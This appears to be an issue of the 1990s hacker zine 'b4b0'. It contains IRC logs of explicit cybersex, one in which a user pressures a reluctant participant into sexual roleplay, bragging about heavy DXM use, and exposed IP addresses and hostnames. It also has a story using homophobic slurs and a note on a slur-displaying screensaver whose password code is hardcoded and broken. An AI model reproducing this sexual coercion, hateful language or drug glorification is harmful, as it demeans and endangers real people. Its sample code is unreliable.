sean ttya1 dialup28:S.0 2:38pm 0.00s 8.86s 8.86s BitchX chrak
cpwright ttyp1 sls17.asb.com 3:28pm 1:09 0.38s 0.05s talk sean
[asphxia(bg0124a@216.76.138.90)] don't sto[
[asphxia(bg0124a@216.76.138.90)] p
[msg(asphxia)] heh
[msg(asphxia)] no u dont stop HEH im the on whacking off HEH!!
ð -> chrak_/asphxia places it in ur mouth HEH.
<ph1x:#dr00gz> anyone hERE?
ð -> chrak_/asphxia wants a BJ HEH!!! ball sucking to oHEH!!
<ph1x:#dr00gz> wakeup asphxia
[msg(ph1x)] hold on 5 minutes
<ph1x:#dr00gz> HEH!
[ph1x(sickmade@01-029.009.popsite.net)] HEH
ð asphxia rubs her tongue up and down your throbbing dick
[ph1x(sickmade@01-029.009.popsite.net)] are you whacking off?
[asphxia(bg0124a@216.76.138.90)] mmmm
<irrupt:#dr00gz> nope.. noone here
ùíù mode/#dr00gz [+o ph1x] by irrupt
ùíù mode/#dr00gz [+oo chrak_ asphxia] by ph1x
<ph1x:#dr00gz> chrak is whacking off
<ph1x:#dr00gz> HEH
[msg(asphxia)] heh
<irrupt:#dr00gz> haha
<ph1x:#dr00gz> he keeps msg'ng me to holdon 5 mins
<chrak_:#dr00gz> shut up i am not HEH!
[asphxia(bg0124a@216.76.138.90)] mmmm
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- -- -
| asphxia (bg0124a@216.76.138.90) (unknown)
³ ircname : bree
| channels : @#dr00gz
³ server : irc.emory.edu ([170.140.4.6] Emory University)
ð asphxia sucks it hard
<ph1x:#dr00gz> um
[asphxia(bg0124a@216.76.138.90)] in
<ph1x:#dr00gz> HEH
[asphxia(bg0124a@216.76.138.90)] out
<ph1x:#dr00gz> yes you are
[asphxia(bg0124a@216.76.138.90)] in out
[msg(asphxia)] herhh
[msg(asphxia)] ok
<ph1x:#dr00gz> du0d
[msg(asphxia)] suck ma balsl HEH!
<ph1x:#dr00gz> yesterday was the worst trip i've ever had on dxm
<ph1x:#dr00gz> it sucked
<ph1x:#dr00gz> HEH!
<ph1x:#dr00gz> listen to this
<ph1x:#dr00gz> My mom was bitching me out
<ph1x:#dr00gz> calling me a robo junkie
<ph1x:#dr00gz> because I told her I drank a shitload of robotussn
<ph1x:#dr00gz> when infact I really took a bunch of pure dxm
<ph1x:#dr00gz> and I got really pissed off
<ph1x:#dr00gz> and punched a huge hole in the wall
<ph1x:#dr00gz> HEH!
<ph1x:#dr00gz> down by the stairs
<ph1x:#dr00gz> and I didnt even feel it
ð asphxia wraps her mouth around your balls and sucks on them
<ph1x:#dr00gz> because dxm makes your body like numb'
<ph1x:#dr00gz> HEH!
[msg(asphxia)] suck ma balsl HEH!
<ph1x:#dr00gz> I could have like karate chopped through metal
[msg(asphxia)] HEH ok
<asphxia:#dr00gz> ph1x
[msg(asphxia)] HEH ok im about to like jizz atnd shti HE Hkeep sucking !
<ph1x:#dr00gz> yes?
ð asphxia sucks them hard
ð asphxia wraps her hand around your cock
<asphxia:#dr00gz> hiya
<asphxia:#dr00gz> bebe
<ph1x:#dr00gz> I can't beleive I actually thought I could act normal in front of my parents on 800mg
<ph1x:#dr00gz> HEH!
[asphxia(bg0124a@216.76.138.90)] mmmmmmm
<ph1x:#dr00gz> HELLO BREE
<asphxia:#dr00gz> hi bebe
<asphxia:#dr00gz> kiss
[msg(asphxia)] ok
* >ph1x #dr00gz strips dravyn naked and gets out his whip and handcuffs
[msg(asphxia)] hurry im hgonna finnish in like 30 seconds HEH
<ph1x:#dr00gz> HEH
[msg(asphxia)] so keep typing HEH!
<ph1x:#dr00gz> you ready for an orgy of pain?
ð asphxia pulls on your phat cock
[asphxia(bg0124a@216.76.138.90)] mmmmm
[asphxia(bg0124a@216.76.138.90)] feels so good
[asphxia(bg0124a@216.76.138.90)] i want to feel you cum
[asphxia(bg0124a@216.76.138.90)] baby
[asphxia(bg0124a@216.76.138.90)] heh
<ph1x:#dr00gz> HEH!?
<asphxia:#dr00gz> yes
[msg(asphxia)] HEH ALMOST
<asphxia:#dr00gz> from you always
<ph1x:#dr00gz> Do you like bondage?
[msg(asphxia)] GWG me niot phix HEH!
[msg(asphxia)] its annoying to stop and start HEH!!
ð asphxia wants you to come baby
[asphxia(bg0124a@216.76.138.90)] mmmm
ùíù mode/#falon [+o ph1x] by Falon
[asphxia(bg0124a@216.76.138.90)] ohhhh
[asphxia(bg0124a@216.76.138.90)] want to fuck
[asphxia(bg0124a@216.76.138.90)] again
[msg(asphxia)] HEH Ok
ð asphxia puts your hot dick into her wet pussy
[asphxia(bg0124a@216.76.138.90)] fuck me
[msg(asphxia)] type fast HEH for like one minute HEH and then il lbe done HEH
ð -> chrak_/asphxia starts pushing it in and out
<asphxia:#dr00gz> yeah
[msg(asphxia)] HEH ur nort getting off to this too r u HEH .
[msg(asphxia)] this works great with pr0n in front of u too HEH!
ð asphxia fucks you hard
ð -> chrak_/asphxia starts pushing it in and out
ð -> chrak_/asphxia HE Halmost done hurry up and fuck HEH!!
ð asphxia sucks onyour nipples
[asphxia(bg0124a@216.76.138.90)] mmmmm
ð asphxia 's muscles tighten
[asphxia(bg0124a@216.76.138.90)] i am gonna cum
[asphxia(bg0124a@216.76.138.90)] babe
[msg(asphxia)] HEH good
ð -> chrak_/asphxia me feels her puss contracting on his cock
[msg(asphxia)] HEH type
[msg(asphxia)] im looking at this like life size pic
[msg(asphxia)] of
[asphxia(bg0124a@216.76.138.90)] mmmmmmmmmm
[msg(asphxia)] a woman cumming HEH!
<ph1x:#dr00gz> DMANIT
<ph1x:#dr00gz> HEH
ð asphxia hope syou cummmmm
<ph1x:#dr00gz> join #hackerz asphxia
<ph1x:#dr00gz> HEH!@#$
[asphxia(bg0124a@216.76.138.90)] i am about to
ð asphxia rams your cock into her wetpussy
[asphxia(bg0124a@216.76.138.90)] oh baby
ð -> chrak_/asphxia begins the final uhm HEH decent into pussy fuck land HEH!
[asphxia(bg0124a@216.76.138.90)] harder4
[asphxia(bg0124a@216.76.138.90)] it feels too good
ð asphxia moans
[msg(asphxia)] HEH discribe ur pussy HEH!
[msg(asphxia)] HEH almsot done HEH!
[asphxia(bg0124a@216.76.138.90)] it is wet
[asphxia(bg0124a@216.76.138.90)] and really deep
[asphxia(bg0124a@216.76.138.90)] and filled up with your hot cock
[asphxia(bg0124a@216.76.138.90)] mmm
[msg(asphxia)] HEH ok
[msg(asphxia)] im all done HEH!
[asphxia(bg0124a@216.76.138.90)] oh
[asphxia(bg0124a@216.76.138.90)] yes
[asphxia(bg0124a@216.76.138.90)] harder
[msg(asphxia)] HEH almsot done HEH!
[msg(asphxia)] HEH
[msg(asphxia)] all doe HEH
[msg(asphxia)] u can help clean up my damn hand and pantz tho HEH!
[asphxia(bg0124a@216.76.138.90)] mmmmmmmmmmmmm
[msg(asphxia)] HEH
[msg(asphxia)] ok
[msg(asphxia)] danke HEH.
[ Channel ][ Nickname ][ user@host ][ level ]
[#falon ][@chrak_ ][~hmm@cpwright.com ] [n/a]
[#falon ][@Falon ][~Falon@x2-11.cosmoaccess.net ] [n/a]
[#falon ][@ph1x ][sickmade@01-029.009.popsite.net ] [n/a]
[msg(ph1x)] HEH hi
[ph1x(sickmade@01-029.009.popsite.net)] hi
[msg(ph1x)] HEH r u talking to asphxia ?
...........................LOG ON
[ph1x(sickmade@01-029.009.popsite.net)] YeZ
ùíù intruderx [haxor@al8-p56-zg.tel.hr] has joined #dr00gz
[msg(ph1x)] ohh.
ùíù mode/#dr00gz [+o intruderx] by ph1x
[msg(ph1x)] HHE abpit what ?
<ph1x:#dr00gz> OK
<ph1x:#dr00gz> hi
IRC log ended Tue Feb 23 16:01:19 1999
-------------------------------------------------------------------------------
HEH zero d4y. no d1str0.
<sek> i could describe how i usually give head, if and when i do
<comp4ct> do it then.
<comp4ct> just using /me
<comp4ct> g0d im going to be here all night.
<sek> if that would work
<comp4ct> well?
<sek> haha
<sek> if you keep complaining, you can just /part you know..
<comp4ct> no
<comp4ct> we have an agreement.
<sek> you are getting lag bursts again
<sek> and why do i have to use /me ?
<comp4ct> because
<comp4ct> well you don't
<comp4ct> /me just makes it all better i guess.
<sek> what if i don't want to use /me?
<sek> hm
<comp4ct> then don't
<comp4ct> just get to the cybering
<sek> this is weird :\
<sek> i'll just describe how i gave my ex head, i guess
<comp4ct> k.
<sek> i used to kinda suprise him, and when he was sitting in his chair talking on IRC, I would unzip his pants and kinda kneel between his legs
<sek> I DON'T WANNA DO THIS
<sek> THIS IS GAY
<comp4ct> you have to.
<comp4ct> du0d
<comp4ct> and you can't tell a fucking story
<sek> :\
<comp4ct> wtf
<sek> i wasn't done
<comp4ct> you gotta describe it like u were doing it to me
<comp4ct> jesus
<sek> why?
<sek> i'm not doing it to you
<comp4ct> tahtz what cyber head is
<comp4ct> tahtz what cyber head is
<comp4ct> tahtz what cyber head is
<sek> i haven't done it to you
<sek> and i prolly won't even ever meet you
<comp4ct> du0d
<sek> sigh
<comp4ct> will u just do it
<sek> fine :\
<comp4ct> use /me
<comp4ct> or something
<comp4ct> but make it sound like erotic
<sek> i hate you. :\
<comp4ct> HEH
<comp4ct> oh well.
<comp4ct> your end of the bargain.
<sek> I didn't even agree
<sek> i said i would think about it
<comp4ct> wtf
<comp4ct> you said "FINE"
<comp4ct> meaning "ok i will"
<comp4ct> meaning "yes"
<comp4ct> making it an affirmation of your agreement.
<sek> OK
<comp4ct> now do it
<sek> WHATEVER
<comp4ct> fucking op everyone you deopped
ð sek kneels between your legs and unzips your pants
<comp4ct> yeah
ð sek pulls out your dick and starts to play with it
<comp4ct> keep going... ..
ð sek licks the very tip of it, and runs her tongue down to the very bottom
<comp4ct> jea.
ð sek sucks a little on the head of your dick
ð sek begins to move her mouth up and down slowly, deepthroating
ð sek starts to move a little faster
<comp4ct> word.
ð sek waits until you cum in her mouth, then pulls back and swallows
<sek> there, happy? :\
<comp4ct> no
<comp4ct> keep going
<sek> SIGH
<comp4ct> im not a minute man!
<sek> why not?
<sek> i'm done :\
<comp4ct> um
<comp4ct> ur done when like i say ur done
<sek> there is only so much you can describe over irc
<comp4ct> thats the way it works heh
<comp4ct> u can get more descriptive
<comp4ct> think of new creative ways
<comp4ct> before i lose th1z m4ss1ve er3ct10n
<sek> sigh
<sek> er, you got hard from that?
<comp4ct> no.
<comp4ct> thasts the problem!@#$
<comp4ct> i should get
<comp4ct> hard from that
<sek> hahah
<comp4ct> now then
<comp4ct> start g1bing head
<sek> eep, my bf just got on irc
<sek> future bf, anyways :P
<comp4ct> i dont care
<comp4ct> this chan is +s
<comp4ct> now then.
<sek> hm
<sek> i do, i'm talking to him :\
<comp4ct> well
<comp4ct> just give me some more cyber head
<comp4ct> and dont tell h1m
<comp4ct> or if u wish ill tell him
<comp4ct> HEH.
<comp4ct> i dont care.
<sek> i thought i did a decent job of giving head over irc :\
<comp4ct> u gotta finish your part of the agreement.
<comp4ct> you did
<comp4ct> but ur not done yet.
<sek> you don't even know who he is
<sek> well how much more can i say?
<comp4ct> just keep talking about u giving me head
<comp4ct> using /me
<comp4ct> and get real descriptive about it
<comp4ct> and dont finish till i say its done
<comp4ct> jeesh
<sek> i dunno how much more i can say :\
<sek> i like to deepthroat
<comp4ct> just start over
<comp4ct> and instead of finishing
<sek> sigh
<comp4ct> keep going
<comp4ct> how hard iz that.
<comp4ct> hEh.
<sek> I have no clue what to say though!
<comp4ct> make stuff up as u go along.
<comp4ct> like ab0ut my long koq and stuff hEH!
<sek> haha
<sek> i dunno if its that long though ;)
<comp4ct> yeah well
<comp4ct> just start over
<comp4ct> and keep going
<comp4ct> and ill um cheer u on from 'above'
<comp4ct> heh3ha
<sek> hahaha, my future-bf just called you a "fuqn wanker"
<sek> bwahaha
<comp4ct> heh.
<comp4ct> well
<comp4ct> fuqn start!
<comp4ct> u gotta finish ur end of the deal jesus chr1st.
<sek> fine
ð sek sighs
<sek> i did
<sek> i gave you irc head
<comp4ct> um
<comp4ct> not really
<comp4ct> it lasted like what 15 seconds/
<comp4ct> irc head is technically at least 4 minutes long last i checked
<comp4ct> irc head rfc HEH
<sek> um, actually i did :\
<comp4ct> just start over and do it again, god damnit.
<comp4ct> heh this is great.
<sek> i can't help it if i can't be that descriptive
<comp4ct> well do it again.
<sek> i dunno what to say
<comp4ct> try harder.
<comp4ct> just imagine what u'd do irl !
<comp4ct> then describ
e it
<sek> er
<comp4ct> heh.
<sek> sigh
<sek> fine
<comp4ct> word
<comp4ct> more irc head.
<comp4ct> th1z iz to elite.
ð sek starts to play with your dick with her fingers, rubbing your head a little
<comp4ct> h3h.
ð sek puts your whole dick in her mouth, and sucks softly
ð sek moves up, and starts to suck on just your head
ð sek runs her tongue over your dick, flicking it softly
<comp4ct> damn
ð sek deepthroats again, and sucks hard
<comp4ct> and she s4id she didn't know how HEHh
<comp4ct> boy u like deepthroating alright.
<comp4ct> h4hahj
<comp4ct> th1z is elite
ð sek shrugs
<sek> guys seem to like it
<sek> and i'm good at it
<comp4ct> k. onward.
<sek> also, if a guy cums in my mouth and i'm deepthroating, i don't taste it :P
<comp4ct> k.
<comp4ct> onward.
<comp4ct> l4nd h03.
ð sek sucks a little harder, and rotates her head a little
ð sek puts some poprocks in her mouth, and sucks a little more
<sek> hEH
<comp4ct> wtf
<comp4ct> dat would burn
<sek> no
<comp4ct> suq a little harder be0tch
<sek> it doesn't
<comp4ct> jea
<comp4ct> well onward ho!
<sek> kinda like ice
<comp4ct> t1ngly
<comp4ct> heh
<comp4ct> continue!
<comp4ct> btw what size cup do u wear
<comp4ct> hEH.
<sek> 36D
<sek> why?
<comp4ct> 36d?
<comp4ct> wow
<comp4ct> EH
<sek> did gr1p give you new.jpg? :\
<comp4ct> no.
<sek> ok.
<comp4ct> haven't seen him in a few dayz
<comp4ct> now continue
ð sek starts to move her head a bit faster, and suck a bit harder
<comp4ct> this is where i grab da back of ur head hEH
<sek> ds just came up here
<comp4ct> ds/?
<sek> datashark
<comp4ct> so
<comp4ct> continue!
<comp4ct> hEH
<sek> er
<sek> fine
ð sek tongues your dick as she sucks
<comp4ct> d4mn skippy.
ð sek moves even faster, sucking harder
<comp4ct> jea b1tch
<comp4ct> t3ll m3 h0w u luv it wh3n i gr4b ur h4ir and force u d33per
<comp4ct> HEH
<sek> er
<comp4ct> TELL m3
<comp4ct> h3h
ð sek is deepthroating already :P
ð sek can't go any deeper
END - comp4ct = elite - END
---------------------------------------------------------------[revolution]
How I literally got kicked out of the Eastern Baptist Church
by schemerz
Disclaimer : Incidents included are all fictionious in nature due to the
shady recollection process after smoking a little bit too much hash. Gewf
was pressing for shtuff and I had to give him something, and these
incidents were funny, at least as I rem ember it. These accounts are
somewhat factual, somewhat not, so I decided just to change the names and
make it safe in case I get anything horribly wrong.
Eastern Baptist Church is located in Topuka, the capital of the state
Kansas. It's not a really big church, but they get in the news alot.
Most of the time they leave their tact at home and picket funerals and
concerts, most recently the funeral of Math ew Sheppard. (I think they
are too chicken to picket the rob zomebie and korn concert in KC last
night, kick ass concert btw, but that's another article... :) They are
also responsible for web sites such as www.goddetestsfags.com. So they
are really a fun bunch. Rush Limbough would have been proud.
Reverend Fred Felps heads the crowd, who was a lawyer in a previous life,
until one of his sons got out of the closet. Fred Felps then runs to the
nearest Warmart to purchase a really bad white robe and calls himself a
preacher. After being thrown out o f the Southern Baptist Church because
of his faggot hating ways, he started his own church, the Eastern Baptist
Church, which basically runs out of his own house along with 20-30 family
members and close friends. They get supported by a lot of white powe r
parties too. Although not all of the family is predominantly prejudgice,
I have had the pleasure of meeting his grandson, Ben Felps, who happens to
be a graduate student doing computer science at University of Kansas. Ben
admins most of his granddaddy 's sites, including of course yours truly.
Enough with the background. I have to explain why I had the urge of
seeing one of these sermons of Fred, if not fucking it up and causing some
serious mayhem:
Almost 3 years ago I arrived in Kansas fresh off the boat, as they would
say afer having a less than stellar high school career somewhere in South
East Asia. Shortly after arriving into the university and being shipped
off to this smelly little dorm room , I was introduced to Sam my new
roomate. He drove me around, showing me stuff and I got to know him very
well. We were just kicking it one weekend in september and started
watching the tele, when channel 6 was doing a special of a concert held at
a loc al community college. Turns out this composer was dying of AIDS,
and someone was holding a concert in his name for being the talent as he
is. (I can't remember this dood's name, but I remember listening to some
of his stuff on the local university radio
now. Truly a talent.) Caught out of the corner of the camera there were these doods holding up signs with slogans like "Anal Sex=Aids=Death", "Gay=Death of Ethics=Death of America" and of course, "God detests fags!". I was thoroughly bewildered at the
sight of such signs, and proceeded to bug Sam about it. Shit like this
at home just does not fly. It's not like asians have a strong tolerance
of homosexuals or racial diversity, but they keep it to themselves and
have the politeness to withhold their opinion at times of mourning, such
as a concert displaying ones work as one dies of aids. Being the fuckwit
18 year old that I was, I suggested to Sam that we would head over and see
one of their sermons and check out their reasoning, because neither of us
can make any logical sense out of Fred's websites. So we called the
church up, asked if it was an open sermon coming up. We stated that we
weren't gonna cause trouble, and putting on my fakeist british accent,
asked if we could attend. We were of co urse declined the opportunity,
since it was a close church.
Being the dumb motherfucker sam can be sometimes, we decided to crash the
party instead. (He's getting married to the least sensible woman on this
planet in a month, so WATCH OUT FOR DA KIDS)
So we hoped into his girlfriends car (btw we chatted this woman up no more
than one week before, and now three years latter sam is fucking marrying
the woman... good god... time has past QUICKLY... oh and she lent him
the car... Megan is so fucking co ol, prolly cause Sam is such a fucking
pimp), and drove to Topuka. We arrived at the church shortly before the
sermon begun, and walked in, saying we are looking for Ben. Ben came out
shortly, trying to cover his blood soaked ass, saying that his grandd ad
was holding a sermon. We talked abit, commenting a little about the
upside down american flag hanging outside the church. He said he would
attend to us shortly after the sermon. I put on the largest puppy dog
eyes I could muster, and asked *very* po litely if I can attend the
sermon. Since he was a ta in one of my computer science lab classes, he
was sure I wasn't going to pull any shit.
We got in, sat on a seat. The living room was packed, and Sam was kinda
chickening out a little... "Maybe we shon't be here dood..." Little did
I know he was one of the most articulate argurers I was ever gonna meet :)
So the sermon went, the usual ch urch shit, yahdayahdayahda... the hymes,
the prayers and all that... until about 45 minutes latter Sam woke me
from deep slumber when Fred started preaching the evils of homosexuality.
People started asking questions as he spoke, and he answered quite
logically. The man was a lawyer I thought, most of them, like my dad,
have a knack of conveying one side of reasoning and made it all
encompassing. So I held up my hand, to which I was asked to speak.
"Reverend Felps, I am new here, in this church and in this country. I don't quite understand why you seem to direct all your problems at one social group who a) pay more taxes per capita then most other minorites, b) are probably more educated as well ?
How can any group contributing to the government and society in such a
way be considered harmful ?"
He muttered something ridiculous like telling me to get a haircut, which
was when Sam (he's got hair down to his ass... I learned never ever to
talk any shit about long hair around him) stood up and started his
rhetoric :)...
"Mr Felps, I would like to know why you are so proliferic about your
projections on to gay people. It is quite entertaining, humorous even,
that you would chose to broadcast your inner id feelings towards
homosexuals on national television. "
Most people got the joke, and gave us the evilest look they could muster.
I must say most people would have backdowned and shut up at this point,
but Sam, oh Sam... what can I say... Anyways, Mr Felps professed that he
did not know what Sam meant.
Sam : "Mr Felps, would you like to answer my friends question as to why
you are targeting one of the more successful groups of minorites of this
country ?"
Felps : "I happen to think their lifestyle is a harmful influence to our
youth in this country. I also happen to percieve that this country is
being overran by faggots. Is there no more decency in this country ?"
(applause by his crowd)
"Mr Felps, as I recall correctly, the american society is firmly
capitalist, meaning that each individual's success is based upon one's
wealth. how would the lifestyle of a homosexual, one of success, good
education and wealth be questionable to the yout h? "
Felps : "As *I* recall correctly, the american society is firmly CHRISTIAN
based. It is because of non-believers such as these homosexuals, that the
youth today stem from the faith. That, is why I am opposed to them."
Me : "But was it not in the new Testament itself that states that we
should love our neighbours ?"
Felps : "Ummmmm... Are you familiar with the book of Sodom ?"
Sam : "Yes I am, and I am familiar with this line of arguement. You would
state that the book of sodom states quite clearly that male-male sexual
activites are forbidden and the only male-female copulation is deemed
allowable by god. You would also stat e that the bible FIRMLY states that
sex is a sacred act of god, and people should not abuse this power. You
will also lead into the argument right here that AIDS and other sexually
transmitted diseases was the repricusion of these acts."
Felps : "You read my mind son. How would you chose to refute these
claims. I am of course a man binded by faith, so please keep any
arguements of the bible's validity to yourself. "
Sam : "Okay... Homosexuality has been documented long since roman times.
How come aids were to come around now?"
Felps : "There are other sexual transmitted diseases that god has
dispensed in his fury upon this planet. Unfortunately the devil has made
the faggot strong in his ways, and they have not been disuaded."
Me : "How about this ? It is nearly medically impossible for lesbians to
contract aids. If god indeed try to make AIDS as a means of disuading
homosexuality, why are a) more hetrosexuals affected ? b) why did he
leave half the faggots off the list ? "
Felps : "God is not fair, he chose to punish the whole of humanity for the
crimes of the faggots. I have taken up the task of god to disuade all of
humanity against the ways of faggots. Lesbians are evil too."
One of us : "You still have not answered the questions we posed, could you
please answer them now ? "
Felps : "I have answered them son. God has other diseases to weaken his
enemy. Aids is only one piece in his arsenal. Gonoerrha, syphillis, etc
etc all attack sexually indecent men and women in some way or another."
One of us : "Alright fair enough, how about this... If a person who is
not sexually promiscous, then it is very unlikely that he or she gets
infected with anything correct ? Is it possible that your god wants to
disuade his people away from promiscious sex ? Has he not made a
distinction between acts of love and acts of passion before ?"
Felps :"God has made it very clear that sexual acts outside of wedlock are
forbidden. "
Me :"Mr Felps, where does it exactly in the bible say that wedlock has to
between a man and a woman ?"
Felps : (stammers some unintelligible... me and sam exchange evil
grinning looks...)
Me : "As a matter of fact, where in the bible does it define the man and
the woman entity, biologically and psychologically ? If this premise is
not made, then all your arguements against homosexuality is up to
question."
Someone in the crowd : "How is that ?"
Sam : "Well it is quite easy to see that a gay couple can be enacting both
the male and female parts of the relationship. With legislation allowing
homosexuals to marry in Hawaii it is perfectly ethical for gays to be in
bounds of christianity and still copulate. No ?"
Someone in the crowd : (something like you fags or faggot loving
liberals... something dumb like that... think it was Ben. )
Someone else in the crowd : (Leave if you don't like what we have to say,
We don't like you anyways.)
Sam : "We are merely discussing the rhetoric in the bible, I personally
made no attacks towards the validity of the good book, neither did my
friend here. "
Some bitch in the crowd : "Shut up you people are full of it as it is!"
Me : "We were merely discussing with the *beloved* reverend the various
interpreations of the bible over a fine comb."
We were asked to leave anyways :) In fact, we didn't leave quite yet
until Sam got his answers from his questions. Sorely to say we were
rather discouraged with our journey towards the interpretations of the
bible. I personally ditched the cross and became a taoist instead.
Oh well... Fred was beaten up in the middle of Kansas City one day when
he was picketing somewhere near the Plaza. HEH it was a sight to behold.
He's wrong. I am right. HAHA
-!- -!- -!- -!- -!- -!- -!- bsaver overview -!- -!- -!- -!- -!- -!- -!- -!-
-i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i-
This little program, based off of Qytpos drugz2.c, has been turned into a
lovely ncurses screen saver. Nice words, derogatory words, and most
importantly; dill monkey words come up -- It's fun for the whole family.
We / I decided to just store the password in this line here.
static char passwd[] = "dillmonkey" ;
if you can code just a teeny bit, you can change this to a macro. did i
mention teeny? We also thought that perhaps you might want to accept a
password via something prompting for a password at each session. Such
might be accomplished by:
static char passwd[20];
...
printf("Enter password to use: ");
sscanf("%20s", passwd);
but the problem is, if you forget, you might as well reboot. Also, you can
have it saved in perhaps a file .bsaver and open, fgets() from it, but
remember the character length has to be 20! You can also merely use the
passwd structure and use your login password via crypt() etc. Anyways, the
code is yours to edit. If there is any problems, mail me at comp4ct@hotmail.com
p.s. don't abuse getch. Hit Enter *ONE TIME* to get a password prompt.
NOTE: If you have any minorities in your office / household, i would not
run this program infront of them. It make lock your console, but if they
see whats popping up, you could be fired / flogged. But isn't that the
b4b0 way?
Good Day,
cp4kt
Special thanks to: Matt Conover (Shok of w00w00) for his great article on
console ioctls. The macros used to lock console were taken from there.
Thank you.
-/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/-
Closing up..
WELP, THATS IT. Hope you enjoyed this totally k-sp1ff, extroidinarily
diverse issue of BABO! Please send many submissions to us for b4b0 8.
submissions@b4b0.org | Comments and questions go to letters@b4b0.org
Your editor, ph1x.
######## ######## ########
## ## ## ##
######## ## ## ########
## ## ## ##
######## ######## ##
* IN THE NEXT EXCITING EPISODE OF B4B0, SAT AND ACT ANSWERS WILL BE GIVEN!
* NOT TO MENTION OUR COPY OF ALIEN AUTOPSY PORNAGRAPHY STARRING JONATHAN
* FRAKES WILL BE UUENCODED AND DISTRIBUTED.
UNTIL THEN, STAY TUNED!